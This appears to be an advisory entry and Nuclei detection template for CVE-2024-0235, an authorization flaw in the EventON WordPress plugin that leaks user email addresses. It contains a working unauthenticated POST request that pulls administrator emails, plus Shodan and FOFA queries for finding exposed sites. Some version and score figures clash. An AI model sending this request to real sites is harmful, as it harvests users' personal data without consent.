5.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
0.029 Low
EPSS
Percentile
90.8%
The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.
id: CVE-2024-0235
info:
name: EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure
author: princechaddha
severity: medium
description: |
The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.
impact: |
An attacker could potentially access sensitive email information.
remediation: |
Update to the latest version of the EventON WordPress Plugin to mitigate CVE-2024-0235.
reference:
- https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://nvd.nist.gov/vuln/detail/CVE-2024-0235
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-0235
cwe-id: CWE-862
epss-score: 0.00052
epss-percentile: 0.19233
cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: myeventon
product: eventon
framework: wordpress
shodan-query:
- "vuln:CVE-2023-2796"
- http.html:/wp-content/plugins/eventon-lite/
- http.html:/wp-content/plugins/eventon/
fofa-query:
- "wp-content/plugins/eventon/"
- body=/wp-content/plugins/eventon/
- body=/wp-content/plugins/eventon-lite/
publicwww-query:
- "/wp-content/plugins/eventon/"
- /wp-content/plugins/eventon-lite/
google-query: "inurl:\"/wp-content/plugins/eventon/\""
tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan,myeventon
http:
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users"
headers:
Content-Type: application/x-www-form-urlencoded
body: "_user_role=administrator"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '@'
- 'status":"good'
- 'value='
- '"content":'
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100c9b0ad3fa93a5b4f9da91f43f446ebcbfebcc8b5ff4204c82656319ba2919c62022027c3257667f4775e2b409d1e8290be69f98cff8f6eaea854344451cd25dfd327:922c64590222798bb761d5b6d8e72950